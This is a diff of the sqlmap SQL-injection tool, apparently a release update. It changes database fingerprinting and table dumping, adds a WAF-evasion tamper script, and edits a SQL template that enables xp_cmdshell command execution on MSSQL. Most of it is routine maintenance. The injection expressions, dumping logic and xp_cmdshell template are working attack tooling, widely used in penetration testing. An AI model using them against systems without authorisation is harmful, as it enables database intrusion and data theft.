||||
(40000, 40032), # MySQL 4.0
|
||||
(40100, 40131), # MySQL 4.1
|
||||
(50000, 50092), # MySQL 5.0
|
||||
(50100, 50156), # MySQL 5.1
|
||||
(50100, 50172), # MySQL 5.1
|
||||
(50400, 50404), # MySQL 5.4
|
||||
(50500, 50521), # MySQL 5.5
|
||||
(50600, 50604), # MySQL 5.6
|
||||
(50500, 50549), # MySQL 5.5
|
||||
(50600, 50630), # MySQL 5.6
|
||||
(50700, 50712), # MySQL 5.7
|
||||
(60000, 60014), # MySQL 6.0
|
||||
)
|
||||
|
||||
@@ -103,6 +107,10 @@ class Fingerprint(GenericFingerprint):
|
||||
value += "back-end DBMS: "
|
||||
actVer = Format.getDbms()
|
||||
|
||||
_ = hashDBRetrieve(HASHDB_KEYS.DBMS_FORK)
|
||||
if _:
|
||||
actVer += " (%s fork)" % _
|
||||
|
||||
if not conf.extensiveFp:
|
||||
value += actVer
|
||||
return value
|
||||
@@ -145,12 +153,6 @@ class Fingerprint(GenericFingerprint):
|
||||
if not conf.extensiveFp and (Backend.isDbmsWithin(MYSQL_ALIASES) \
|
||||
or (conf.dbms or "").lower() in MYSQL_ALIASES) and Backend.getVersion() and \
|
||||
Backend.getVersion() != UNKNOWN_DBMS_VERSION:
|
||||
v = Backend.getVersion().replace(">", "")
|
||||
v = v.replace("=", "")
|
||||
v = v.replace(" ", "")
|
||||
|
||||
Backend.setVersion(v)
|
||||
|
||||
setDbms("%s %s" % (DBMS.MYSQL, Backend.getVersion()))
|
||||
|
||||
if Backend.isVersionGreaterOrEqualThan("5"):
|
||||
@@ -177,6 +179,9 @@ class Fingerprint(GenericFingerprint):
|
||||
|
||||
return False
|
||||
|
||||
if hashDBRetrieve(HASHDB_KEYS.DBMS_FORK) is None:
|
||||
hashDBWrite(HASHDB_KEYS.DBMS_FORK, inject.checkBooleanExpression("VERSION() LIKE '%MariaDB%'") and "MariaDB" or "")
|
||||
|
||||
# reading information_schema on some platforms is causing annoying timeout exits
|
||||
# Reference: http://bugs.mysql.com/bug.php?id=15855
|
||||
|
||||
|
||||
@@ -102,7 +102,8 @@ class Fingerprint(GenericFingerprint):
|
||||
infoMsg = "actively fingerprinting %s" % DBMS.ORACLE
|
||||
logger.info(infoMsg)
|
||||
|
||||
for version in ("11i", "10g", "9i", "8i"):
|
||||
# Reference: https://en.wikipedia.org/wiki/Oracle_Database
|
||||
for version in ("12c", "11g", "10g", "9i", "8i"):
|
||||
number = int(re.search("([\d]+)", version).group(1))
|
||||
output = inject.checkBooleanExpression("%d=(SELECT SUBSTR((VERSION),1,%d) FROM SYS.PRODUCT_COMPONENT_VERSION WHERE ROWNUM=1)" % (number, 1 if number < 10 else 2))
|
||||
|
||||
|
||||
@@ -41,7 +41,7 @@ class Connector(GenericConnector):
|
||||
|
||||
try:
|
||||
self.connector = pymssql.connect(host="%s:%d" % (self.hostname, self.port), user=self.user, password=self.password, database=self.db, login_timeout=conf.timeout, timeout=conf.timeout)
|
||||
except (pymssql.ProgrammingError, pymssql.OperationalError, _mssql.MssqlDatabaseException), msg:
|
||||
except (pymssql.Error, _mssql.MssqlDatabaseException), msg:
|
||||
raise SqlmapConnectionException(msg)
|
||||
|
||||
self.initCursor()
|
||||
@@ -50,7 +50,7 @@ class Connector(GenericConnector):
|
||||
def fetchall(self):
|
||||
try:
|
||||
return self.cursor.fetchall()
|
||||
except (pymssql.ProgrammingError, pymssql.OperationalError, _mssql.MssqlDatabaseException), msg:
|
||||
except (pymssql.Error, _mssql.MssqlDatabaseException), msg:
|
||||
logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % str(msg).replace("\n", " "))
|
||||
return None
|
||||
|
||||
|
||||
@@ -8,6 +8,7 @@ See the file 'doc/COPYING' for copying permission
|
||||
from lib.core.agent import agent
|
||||
from lib.core.common import arrayizeValue
|
||||
from lib.core.common import Backend
|
||||
from lib.core.common import extractRegexResult
|
||||
from lib.core.common import filterPairValues
|
||||
from lib.core.common import flattenValue
|
||||
from lib.core.common import getLimitRange
|
||||
@@ -19,6 +20,7 @@ from lib.core.common import isTechniqueAvailable
|
||||
from lib.core.common import parseSqliteTableSchema
|
||||
from lib.core.common import popValue
|
||||
from lib.core.common import pushValue
|
||||
from lib.core.common import randomStr
|
||||
from lib.core.common import readInput
|
||||
from lib.core.common import safeSQLIdentificatorNaming
|
||||
from lib.core.common import singleTimeWarnMessage
|
||||
@@ -41,6 +43,7 @@ from lib.core.settings import CURRENT_DB
|
||||
from lib.request import inject
|
||||
from lib.techniques.brute.use import columnExists
|
||||
from lib.techniques.brute.use import tableExists
|
||||
from lib.techniques.union.use import unionUse
|
||||
|
||||
class Databases:
|
||||
"""
|
||||
@@ -450,7 +453,7 @@ class Databases:
|
||||
|
||||
elif Backend.isDbms(DBMS.ACCESS):
|
||||
errMsg = "cannot retrieve column names, "
|
||||
errMsg += "back-end DBMS is Access"
|
||||
errMsg += "back-end DBMS is %s" % DBMS.ACCESS
|
||||
logger.error(errMsg)
|
||||
bruteForce = True
|
||||
|
||||
@@ -539,7 +542,22 @@ class Databases:
|
||||
infoMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(conf.db)
|
||||
logger.info(infoMsg)
|
||||
|
||||
values = inject.getValue(query, blind=False, time=False)
|
||||
values = None
|
||||
if Backend.isDbms(DBMS.MSSQL) and isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION):
|
||||
expression = query
|
||||
kb.dumpColumns = []
|
||||
kb.rowXmlMode = True
|
||||
|
||||
for column in extractRegexResult(r"SELECT (?P<result>.+?) FROM", query).split(','):
|
||||
kb.dumpColumns.append(randomStr().lower())
|
||||
expression = expression.replace(column, "%s AS %s" % (column, kb.dumpColumns[-1]), 1)
|
||||
|
||||
values = unionUse(expression)
|
||||
kb.rowXmlMode = False
|
||||
kb.dumpColumns = None
|
||||
|
||||
if values is None:
|
||||
values = inject.getValue(query, blind=False, time=False)
|
||||
|
||||
if Backend.isDbms(DBMS.MSSQL) and isNoneValue(values):
|
||||
index, values = 1, []
|
||||
@@ -572,7 +590,11 @@ class Databases:
|
||||
query = _.query % (unsafeSQLIdentificatorNaming(conf.db.upper()), unsafeSQLIdentificatorNaming(tbl.upper()), unsafeSQLIdentificatorNaming(name.upper()))
|
||||
else:
|
||||
query = _.query % (unsafeSQLIdentificatorNaming(conf.db), unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(name))
|
||||
|
||||
comment = unArrayizeValue(inject.getValue(query, blind=False, time=False))
|
||||
if not isNoneValue(comment):
|
||||
infoMsg = "retrieved comment '%s' for column '%s'" % (comment, name)
|
||||
logger.info(infoMsg)
|
||||
else:
|
||||
warnMsg = "on %s it is not " % Backend.getIdentifiedDbms()
|
||||
warnMsg += "possible to get column comments"
|
||||
@@ -702,7 +724,11 @@ class Databases:
|
||||
query = _.query % (unsafeSQLIdentificatorNaming(conf.db.upper()), unsafeSQLIdentificatorNaming(tbl.upper()), unsafeSQLIdentificatorNaming(column.upper()))
|
||||
else:
|
||||
query = _.query % (unsafeSQLIdentificatorNaming(conf.db), unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(column))
|
||||
|
||||
comment = unArrayizeValue(inject.getValue(query, union=False, error=False))
|
||||
if not isNoneValue(comment):
|
||||
infoMsg = "retrieved comment '%s' for column '%s'" % (comment, column)
|
||||
logger.info(infoMsg)
|
||||
else:
|
||||
warnMsg = "on %s it is not " % Backend.getIdentifiedDbms()
|
||||
warnMsg += "possible to get column comments"
|
||||
|
||||
@@ -19,9 +19,7 @@ from lib.core.common import isListLike
|
||||
from lib.core.common import isNoneValue
|
||||
from lib.core.common import isNumPosStrValue
|
||||
from lib.core.common import isTechniqueAvailable
|
||||
from lib.core.common import popValue
|
||||
from lib.core.common import prioritySortColumns
|
||||
from lib.core.common import pushValue
|
||||
from lib.core.common import readInput
|
||||
from lib.core.common import safeSQLIdentificatorNaming
|
||||
from lib.core.common import unArrayizeValue
|
||||
@@ -139,6 +137,7 @@ class Entries:
|
||||
logger.warn(warnMsg)
|
||||
continue
|
||||
|
||||
kb.dumpColumns = colList
|
||||
colNames = colString = ", ".join(column for column in colList)
|
||||
rootQuery = queries[Backend.getIdentifiedDbms()].dump_table
|
||||
|
||||
@@ -169,7 +168,14 @@ class Entries:
|
||||
if not (isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION) and kb.injection.data[PAYLOAD.TECHNIQUE.UNION].where == PAYLOAD.WHERE.ORIGINAL):
|
||||
table = "%s.%s" % (conf.db, tbl)
|
||||
|
||||
retVal = pivotDumpTable(table, colList, blind=False)
|
||||
try:
|
||||
retVal = pivotDumpTable(table, colList, blind=False)
|
||||
except KeyboardInterrupt:
|
||||
retVal = None
|
||||
kb.dumpKeyboardInterrupt = True
|
||||
clearConsoleLine()
|
||||
warnMsg = "Ctrl+C detected in dumping phase"
|
||||
logger.warn(warnMsg)
|
||||
|
||||
if retVal:
|
||||
entries, _ = retVal
|
||||
@@ -207,8 +213,7 @@ class Entries:
|
||||
else:
|
||||
colEntry = unArrayizeValue(entry[index]) if index < len(entry) else u''
|
||||
|
||||
_ = len(DUMP_REPLACEMENTS.get(getUnicode(colEntry), getUnicode(colEntry)))
|
||||
maxLen = max(len(column), _)
|
||||
maxLen = max(len(column), len(DUMP_REPLACEMENTS.get(getUnicode(colEntry), getUnicode(colEntry))))
|
||||
|
||||
if maxLen > kb.data.dumpedTable[column]["length"]:
|
||||
kb.data.dumpedTable[column]["length"] = maxLen
|
||||
@@ -269,7 +274,14 @@ class Entries:
|
||||
elif Backend.isDbms(DBMS.MAXDB):
|
||||
table = "%s.%s" % (conf.db, tbl)
|
||||
|
||||
retVal = pivotDumpTable(table, colList, count, blind=True)
|
||||
try:
|
||||
retVal = pivotDumpTable(table, colList, count, blind=True)
|
||||
except KeyboardInterrupt:
|
||||
retVal = None
|
||||
kb.dumpKeyboardInterrupt = True
|
||||
clearConsoleLine()
|
||||
warnMsg = "Ctrl+C detected in dumping phase"
|
||||
logger.warn(warnMsg)
|
||||
|
||||
if retVal:
|
||||
entries, lengths = retVal
|
||||
@@ -280,8 +292,11 @@ class Entries:
|
||||
indexRange = getLimitRange(count, plusOne=plusOne)
|
||||
|
||||
if len(colList) < len(indexRange) > CHECK_ZERO_COLUMNS_THRESHOLD:
|
||||
debugMsg = "checking for empty columns"
|
||||
logger.debug(infoMsg)
|
||||
|
||||
for column in colList:
|
||||
if inject.getValue("SELECT COUNT(%s) FROM %s" % (column, kb.dumpTable), union=False, error=False) == '0':
|
||||
if not inject.checkBooleanExpression("(SELECT COUNT(%s) FROM %s)>0" % (column, kb.dumpTable)):
|
||||
emptyColumns.append(column)
|
||||
debugMsg = "column '%s' of table '%s' will not be " % (column, kb.dumpTable)
|
||||
debugMsg += "dumped as it appears to be empty"
|
||||
@@ -315,11 +330,11 @@ class Entries:
|
||||
value = NULL if column in emptyColumns else inject.getValue(query, union=False, error=False, dump=True)
|
||||
value = '' if value is None else value
|
||||
|
||||
_ = DUMP_REPLACEMENTS.get(getUnicode(value), getUnicode(value))
|
||||
lengths[column] = max(lengths[column], len(_))
|
||||
lengths[column] = max(lengths[column], len(DUMP_REPLACEMENTS.get(getUnicode(value), getUnicode(value))))
|
||||
entries[column].append(value)
|
||||
|
||||
except KeyboardInterrupt:
|
||||
kb.dumpKeyboardInterrupt = True
|
||||
clearConsoleLine()
|
||||
warnMsg = "Ctrl+C detected in dumping phase"
|
||||
logger.warn(warnMsg)
|
||||
@@ -356,6 +371,7 @@ class Entries:
|
||||
logger.critical(errMsg)
|
||||
|
||||
finally:
|
||||
kb.dumpColumns = None
|
||||
kb.dumpTable = None
|
||||
|
||||
def dumpAll(self):
|
||||
|
||||
@@ -28,6 +28,7 @@ from lib.core.enums import CHARSET_TYPE
|
||||
from lib.core.enums import EXPECTED
|
||||
from lib.core.enums import PAYLOAD
|
||||
from lib.core.exception import SqlmapUndefinedMethod
|
||||
from lib.core.settings import UNICODE_ENCODING
|
||||
from lib.request import inject
|
||||
|
||||
class Filesystem:
|
||||
@@ -69,7 +70,7 @@ class Filesystem:
|
||||
|
||||
if isNumPosStrValue(remoteFileSize):
|
||||
remoteFileSize = long(remoteFileSize)
|
||||
localFile = getUnicode(localFile, encoding=sys.getfilesystemencoding())
|
||||
localFile = getUnicode(localFile, encoding=sys.getfilesystemencoding() or UNICODE_ENCODING)
|
||||
sameFile = False
|
||||
|
||||
if localFileSize == remoteFileSize:
|
||||
@@ -87,7 +88,7 @@ class Filesystem:
|
||||
else:
|
||||
sameFile = False
|
||||
warnMsg = "it looks like the file has not been written (usually "
|
||||
warnMsg += "occurs if the DBMS process' user has no write "
|
||||
warnMsg += "occurs if the DBMS process user has no write "
|
||||
warnMsg += "privileges in the destination path)"
|
||||
logger.warn(warnMsg)
|
||||
|
||||
|
||||
@@ -2,5 +2,5 @@ EXEC master..sp_configure 'show advanced options',1;
|
||||
RECONFIGURE WITH OVERRIDE;
|
||||
EXEC master..sp_configure 'xp_cmdshell',%ENABLE%;
|
||||
RECONFIGURE WITH OVERRIDE;
|
||||
EXEC sp_configure 'show advanced options',0;
|
||||
EXEC master..sp_configure 'show advanced options',0;
|
||||
RECONFIGURE WITH OVERRIDE
|
||||
|
||||
22
sqlmap.conf
22
sqlmap.conf
@@ -124,7 +124,7 @@ tor = False
|
||||
|
||||
# Set Tor proxy type.
|
||||
# Valid: HTTP, SOCKS4, SOCKS5
|
||||
torType = HTTP
|
||||
torType = SOCKS5
|
||||
|
||||
# Check to see if Tor is used properly.
|
||||
# Valid: True or False
|
||||
@@ -482,6 +482,9 @@ col =
|
||||
# Back-end database management system database table column(s) to not enumerate.
|
||||
excludeCol =
|
||||
|
||||
# Pivot column name.
|
||||
pivotColumn =
|
||||
|
||||
# Use WHERE condition while table dumping (e.g. "id=1").
|
||||
dumpWhere =
|
||||
|
||||
@@ -650,6 +653,9 @@ trafficFile =
|
||||
# Valid: True or False
|
||||
batch = False
|
||||
|
||||
# Result fields having binary values (e.g. "digest").
|
||||
binaryFields =
|
||||
|
||||
# Force character encoding used for data retrieval.
|
||||
charset =
|
||||
|
||||
@@ -697,9 +703,6 @@ outputDir =
|
||||
# Valid: True or False
|
||||
parseErrors = False
|
||||
|
||||
# Pivot column name.
|
||||
pivotColumn =
|
||||
|
||||
# Regular expression for filtering targets from provided Burp.
|
||||
# or WebScarab proxy log.
|
||||
# Example: (google|yahoo)
|
||||
@@ -753,10 +756,6 @@ googlePage = 1
|
||||
# Valid: True or False
|
||||
identifyWaf = False
|
||||
|
||||
# Skip heuristic detection of WAF/IPS/IDS protection.
|
||||
# Valid: True or False
|
||||
skipWaf = False
|
||||
|
||||
# Imitate smartphone through HTTP User-Agent header.
|
||||
# Valid: True or False
|
||||
mobile = False
|
||||
@@ -769,10 +768,17 @@ offline = False
|
||||
# Valid: True or False
|
||||
pageRank = False
|
||||
|
||||
# Skip heuristic detection of WAF/IPS/IDS protection.
|
||||
# Valid: True or False
|
||||
skipWaf = False
|
||||
|
||||
# Conduct thorough tests only if positive heuristic(s).
|
||||
# Valid: True or False
|
||||
smart = False
|
||||
|
||||
# Local directory for storing temporary files.
|
||||
tmpDir =
|
||||
|
||||
# Simple wizard interface for beginner users.
|
||||
# Valid: True or False
|
||||
wizard = False
|
||||
|
||||
186
sqlmap.py
186
sqlmap.py
@@ -5,7 +5,15 @@ Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
|
||||
See the file 'doc/COPYING' for copying permission
|
||||
"""
|
||||
|
||||
import sys
|
||||
|
||||
sys.dont_write_bytecode = True
|
||||
|
||||
from lib.utils import versioncheck # this has to be the first non-standard import
|
||||
|
||||
import bdb
|
||||
import distutils
|
||||
import glob
|
||||
import inspect
|
||||
import logging
|
||||
import os
|
||||
@@ -13,45 +21,55 @@ import re
|
||||
import shutil
|
||||
import sys
|
||||
import thread
|
||||
import threading
|
||||
import time
|
||||
import traceback
|
||||
import warnings
|
||||
|
||||
sys.dont_write_bytecode = True
|
||||
|
||||
warnings.filterwarnings(action="ignore", message=".*was already imported", category=UserWarning)
|
||||
warnings.filterwarnings(action="ignore", category=DeprecationWarning)
|
||||
|
||||
from lib.utils import versioncheck # this has to be the first non-standard import
|
||||
|
||||
from lib.controller.controller import start
|
||||
from lib.core.common import banner
|
||||
from lib.core.common import createGithubIssue
|
||||
from lib.core.common import dataToStdout
|
||||
from lib.core.common import getSafeExString
|
||||
from lib.core.common import getUnicode
|
||||
from lib.core.common import maskSensitiveData
|
||||
from lib.core.common import setPaths
|
||||
from lib.core.common import weAreFrozen
|
||||
from lib.core.data import cmdLineOptions
|
||||
from lib.core.data import conf
|
||||
from lib.core.data import kb
|
||||
from lib.core.data import logger
|
||||
from lib.core.data import paths
|
||||
from lib.core.common import unhandledExceptionMessage
|
||||
from lib.core.exception import SqlmapBaseException
|
||||
from lib.core.exception import SqlmapShellQuitException
|
||||
from lib.core.exception import SqlmapSilentQuitException
|
||||
from lib.core.exception import SqlmapUserQuitException
|
||||
from lib.core.option import initOptions
|
||||
from lib.core.option import init
|
||||
from lib.core.profiling import profile
|
||||
from lib.core.settings import LEGAL_DISCLAIMER
|
||||
from lib.core.testing import smokeTest
|
||||
from lib.core.testing import liveTest
|
||||
from lib.parse.cmdline import cmdLineParser
|
||||
from lib.utils.api import setRestAPILog
|
||||
from lib.utils.api import StdDbOut
|
||||
|
||||
try:
|
||||
from lib.controller.controller import start
|
||||
from lib.core.common import banner
|
||||
from lib.core.common import checkIntegrity
|
||||
from lib.core.common import createGithubIssue
|
||||
from lib.core.common import dataToStdout
|
||||
from lib.core.common import getSafeExString
|
||||
from lib.core.common import getUnicode
|
||||
from lib.core.common import maskSensitiveData
|
||||
from lib.core.common import setPaths
|
||||
from lib.core.common import weAreFrozen
|
||||
from lib.core.data import cmdLineOptions
|
||||
from lib.core.data import conf
|
||||
from lib.core.data import kb
|
||||
from lib.core.common import unhandledExceptionMessage
|
||||
from lib.core.common import MKSTEMP_PREFIX
|
||||
from lib.core.exception import SqlmapBaseException
|
||||
from lib.core.exception import SqlmapShellQuitException
|
||||
from lib.core.exception import SqlmapSilentQuitException
|
||||
from lib.core.exception import SqlmapUserQuitException
|
||||
from lib.core.option import initOptions
|
||||
from lib.core.option import init
|
||||
from lib.core.profiling import profile
|
||||
from lib.core.settings import GIT_PAGE
|
||||
from lib.core.settings import IS_WIN
|
||||
from lib.core.settings import LEGAL_DISCLAIMER
|
||||
from lib.core.settings import THREAD_FINALIZATION_TIMEOUT
|
||||
from lib.core.settings import UNICODE_ENCODING
|
||||
from lib.core.settings import VERSION
|
||||
from lib.core.testing import smokeTest
|
||||
from lib.core.testing import liveTest
|
||||
from lib.parse.cmdline import cmdLineParser
|
||||
from lib.utils.api import setRestAPILog
|
||||
from lib.utils.api import StdDbOut
|
||||
except KeyboardInterrupt:
|
||||
errMsg = "user aborted"
|
||||
logger.error(errMsg)
|
||||
|
||||
raise SystemExit
|
||||
|
||||
def modulePath():
|
||||
"""
|
||||
@@ -64,7 +82,24 @@ def modulePath():
|
||||
except NameError:
|
||||
_ = inspect.getsourcefile(modulePath)
|
||||
|
||||
return getUnicode(os.path.dirname(os.path.realpath(_)), encoding=sys.getfilesystemencoding())
|
||||
return getUnicode(os.path.dirname(os.path.realpath(_)), encoding=sys.getfilesystemencoding() or UNICODE_ENCODING)
|
||||
|
||||
def checkEnvironment():
|
||||
try:
|
||||
os.path.isdir(modulePath())
|
||||
except UnicodeEncodeError:
|
||||
errMsg = "your system does not properly handle non-ASCII paths. "
|
||||
errMsg += "Please move the sqlmap's directory to the other location"
|
||||
logger.critical(errMsg)
|
||||
raise SystemExit
|
||||
|
||||
if distutils.version.LooseVersion(VERSION) < distutils.version.LooseVersion("1.0"):
|
||||
errMsg = "your runtime environment (e.g. PYTHONPATH) is "
|
||||
errMsg += "broken. Please make sure that you are not running "
|
||||
errMsg += "newer versions of sqlmap with runtime scripts for older "
|
||||
errMsg += "versions"
|
||||
logger.critical(errMsg)
|
||||
raise SystemExit
|
||||
|
||||
def main():
|
||||
"""
|
||||
@@ -72,17 +107,10 @@ def main():
|
||||
"""
|
||||
|
||||
try:
|
||||
paths.SQLMAP_ROOT_PATH = modulePath()
|
||||
checkEnvironment()
|
||||
|
||||
try:
|
||||
os.path.isdir(paths.SQLMAP_ROOT_PATH)
|
||||
except UnicodeEncodeError:
|
||||
errMsg = "your system does not properly handle non-ASCII paths. "
|
||||
errMsg += "Please move the sqlmap's directory to the other location"
|
||||
logger.error(errMsg)
|
||||
raise SystemExit
|
||||
|
||||
setPaths()
|
||||
setPaths(modulePath())
|
||||
banner()
|
||||
|
||||
# Store original command line options for possible later restoration
|
||||
cmdLineOptions.update(cmdLineParser().__dict__)
|
||||
@@ -95,8 +123,6 @@ def main():
|
||||
sys.stderr = StdDbOut(conf.taskid, messagetype="stderr")
|
||||
setRestAPILog()
|
||||
|
||||
banner()
|
||||
|
||||
conf.showTime = True
|
||||
dataToStdout("[!] legal disclaimer: %s\n\n" % LEGAL_DISCLAIMER, forceOutput=True)
|
||||
dataToStdout("[*] starting at %s\n\n" % time.strftime("%X"), forceOutput=True)
|
||||
@@ -168,11 +194,50 @@ def main():
|
||||
excMsg = traceback.format_exc()
|
||||
|
||||
try:
|
||||
if any(_ in excMsg for _ in ("No space left", "Disk quota exceeded")):
|
||||
if not checkIntegrity():
|
||||
errMsg = "code integrity check failed. "
|
||||
errMsg += "You should retrieve the latest development version from official GitHub "
|
||||
errMsg += "repository at '%s'" % GIT_PAGE
|
||||
logger.critical(errMsg)
|
||||
print
|
||||
dataToStdout(excMsg)
|
||||
raise SystemExit
|
||||
|
||||
elif any(_ in excMsg for _ in ("No space left", "Disk quota exceeded")):
|
||||
errMsg = "no space left on output device"
|
||||
logger.error(errMsg)
|
||||
raise SystemExit
|
||||
|
||||
elif all(_ in excMsg for _ in ("No such file", "_'", "self.get_prog_name()")):
|
||||
errMsg = "corrupted installation detected ('%s'). " % excMsg.strip().split('\n')[-1]
|
||||
errMsg += "You should retrieve the latest development version from official GitHub "
|
||||
errMsg += "repository at '%s'" % GIT_PAGE
|
||||
logger.error(errMsg)
|
||||
raise SystemExit
|
||||
|
||||
elif "Read-only file system" in excMsg:
|
||||
errMsg = "output device is mounted as read-only"
|
||||
logger.error(errMsg)
|
||||
raise SystemExit
|
||||
|
||||
elif "OperationalError: disk I/O error" in excMsg:
|
||||
errMsg = "I/O error on output device"
|
||||
logger.error(errMsg)
|
||||
raise SystemExit
|
||||
|
||||
elif "_mkstemp_inner" in excMsg:
|
||||
errMsg = "there has been a problem while accessing temporary files"
|
||||
logger.error(errMsg)
|
||||
raise SystemExit
|
||||
|
||||
elif "can't start new thread" in excMsg:
|
||||
errMsg = "there has been a problem while creating new thread instance. "
|
||||
errMsg += "Please make sure that you are not running too many processes"
|
||||
if not IS_WIN:
|
||||
errMsg += " (or increase the 'ulimit -u' value)"
|
||||
logger.error(errMsg)
|
||||
raise SystemExit
|
||||
|
||||
elif all(_ in excMsg for _ in ("pymysql", "configparser")):
|
||||
errMsg = "wrong initialization of pymsql detected (using Python3 dependencies)"
|
||||
logger.error(errMsg)
|
||||
@@ -185,6 +250,9 @@ def main():
|
||||
logger.error(errMsg)
|
||||
raise SystemExit
|
||||
|
||||
elif "valueStack.pop" in excMsg and kb.get("dumpKeyboardInterrupt"):
|
||||
raise SystemExit
|
||||
|
||||
for match in re.finditer(r'File "(.+?)", line', excMsg):
|
||||
file_ = match.group(1)
|
||||
file_ = os.path.relpath(file_, os.path.dirname(__file__))
|
||||
@@ -208,13 +276,21 @@ def main():
|
||||
|
||||
finally:
|
||||
kb.threadContinue = False
|
||||
kb.threadException = True
|
||||
|
||||
if conf.get("showTime"):
|
||||
dataToStdout("\n[*] shutting down at %s\n\n" % time.strftime("%X"), forceOutput=True)
|
||||
|
||||
kb.threadException = True
|
||||
|
||||
if kb.get("tempDir"):
|
||||
shutil.rmtree(kb.tempDir, ignore_errors=True)
|
||||
for prefix in (MKSTEMP_PREFIX.IPC, MKSTEMP_PREFIX.TESTING, MKSTEMP_PREFIX.COOKIE_JAR, MKSTEMP_PREFIX.BIG_ARRAY):
|
||||
for filepath in glob.glob(os.path.join(kb.tempDir, "%s*" % prefix)):
|
||||
try:
|
||||
os.remove(filepath)
|
||||
except OSError:
|
||||
pass
|
||||
if not filter(None, (filepath for filepath in glob.glob(os.path.join(kb.tempDir, '*')) if not any(filepath.endswith(_) for _ in ('.lock', '.exe', '_')))):
|
||||
shutil.rmtree(kb.tempDir, ignore_errors=True)
|
||||
|
||||
if conf.get("hashDB"):
|
||||
try:
|
||||
@@ -230,16 +306,24 @@ def main():
|
||||
|
||||
if hasattr(conf, "api"):
|
||||
try:
|
||||
conf.database_cursor.disconnect()
|
||||
conf.databaseCursor.disconnect()
|
||||
except KeyboardInterrupt:
|
||||
pass
|
||||
|
||||
if conf.get("dumper"):
|
||||
conf.dumper.flush()
|
||||
|
||||
# Reference: http://stackoverflow.com/questions/1635080/terminate-a-multi-thread-python-program
|
||||
if conf.get("threads", 0) > 1 or conf.get("dnsServer"):
|
||||
os._exit(0)
|
||||
# short delay for thread finalization
|
||||
try:
|
||||
_ = time.time()
|
||||
while threading.activeCount() > 1 and (time.time() - _) > THREAD_FINALIZATION_TIMEOUT:
|
||||
time.sleep(0.01)
|
||||
except KeyboardInterrupt:
|
||||
pass
|
||||
finally:
|
||||
# Reference: http://stackoverflow.com/questions/1635080/terminate-a-multi-thread-python-program
|
||||
if threading.activeCount() > 1:
|
||||
os._exit(0)
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
||||
|
||||
@@ -15,7 +15,6 @@ from lib.utils import versioncheck # this has to be the first non-standard impo
|
||||
|
||||
from sqlmap import modulePath
|
||||
from lib.core.common import setPaths
|
||||
from lib.core.data import paths
|
||||
from lib.core.data import logger
|
||||
from lib.core.settings import RESTAPI_DEFAULT_ADAPTER
|
||||
from lib.core.settings import RESTAPI_DEFAULT_ADDRESS
|
||||
@@ -31,9 +30,8 @@ def main():
|
||||
# Set default logging level to debug
|
||||
logger.setLevel(logging.DEBUG)
|
||||
|
||||
# Initialize path variable
|
||||
paths.SQLMAP_ROOT_PATH = modulePath()
|
||||
setPaths()
|
||||
# Initialize paths
|
||||
setPaths(modulePath())
|
||||
|
||||
# Parse command line options
|
||||
apiparser = optparse.OptionParser()
|
||||
|
||||
37
tamper/commalesslimit.py
Normal file
37
tamper/commalesslimit.py
Normal file
@@ -0,0 +1,37 @@
|
||||
#!/usr/bin/env python
|
||||
|
||||
"""
|
||||
Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
|
||||
See the file 'doc/COPYING' for copying permission
|
||||
"""
|
||||
|
||||
import re
|
||||
|
||||
from lib.core.enums import PRIORITY
|
||||
|
||||
__priority__ = PRIORITY.HIGH
|
||||
|
||||
def dependencies():
|
||||
pass
|
||||
|
||||
def tamper(payload, **kwargs):
|
||||
"""
|
||||
Replaces instances like 'LIMIT M, N' with 'LIMIT N OFFSET M'
|
||||
|
||||
Requirement:
|
||||
* MySQL
|
||||
|
||||
Tested against:
|
||||
* MySQL 5.0 and 5.5
|
||||
|
||||
>>> tamper('LIMIT 2, 3')
|
||||
'LIMIT 3 OFFSET 2'
|
||||
"""
|
||||
|
||||
retVal = payload
|
||||
|
||||
match = re.search(r"(?i)LIMIT\s*(\d+),\s*(\d+)", payload or "")
|
||||
if match:
|
||||
retVal = retVal.replace(match.group(0), "LIMIT %s OFFSET %s" % (match.group(2), match.group(1)))
|
||||
|
||||
return retVal
|
||||
@@ -5,10 +5,7 @@ Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
|
||||
See the file 'doc/COPYING' for copying permission
|
||||
"""
|
||||
|
||||
import base64
|
||||
|
||||
from lib.core.enums import PRIORITY
|
||||
from lib.core.settings import UNICODE_ENCODING
|
||||
|
||||
__priority__ = PRIORITY.LOWEST
|
||||
|
||||
|
||||
2
thirdparty/bottle/bottle.py
vendored
2
thirdparty/bottle/bottle.py
vendored
@@ -95,7 +95,7 @@ try:
|
||||
return (args, varargs, keywords, tuple(defaults) or None)
|
||||
except ImportError:
|
||||
from inspect import getargspec
|
||||
|
||||
|
||||
try:
|
||||
from simplejson import dumps as json_dumps, loads as json_lds
|
||||
except ImportError: # pragma: no cover
|
||||
|
||||
2
thirdparty/clientform/clientform.py
vendored
2
thirdparty/clientform/clientform.py
vendored
@@ -1142,7 +1142,7 @@ def _ParseFileEx(file, base_uri,
|
||||
try:
|
||||
form.fixup()
|
||||
except AttributeError, ex:
|
||||
if "item is disabled" not in str(ex):
|
||||
if not any(_ in str(ex) for _ in ("is disabled", "is readonly")):
|
||||
raise
|
||||
return forms
|
||||
|
||||
|
||||
7
thirdparty/colorama/__init__.py
vendored
7
thirdparty/colorama/__init__.py
vendored
@@ -0,0 +1,7 @@
|
||||
# Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file.
|
||||
from .initialise import init, deinit, reinit, colorama_text
|
||||
from .ansi import Fore, Back, Style, Cursor
|
||||
from .ansitowin32 import AnsiToWin32
|
||||
|
||||
__version__ = '0.3.7'
|
||||
|
||||
|
||||
109
thirdparty/colorama/ansi.py
vendored
109
thirdparty/colorama/ansi.py
vendored
@@ -1,49 +1,102 @@
|
||||
# Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file.
|
||||
'''
|
||||
This module generates ANSI character codes to printing colors to terminals.
|
||||
See: http://en.wikipedia.org/wiki/ANSI_escape_code
|
||||
'''
|
||||
|
||||
CSI = '\033['
|
||||
OSC = '\033]'
|
||||
BEL = '\007'
|
||||
|
||||
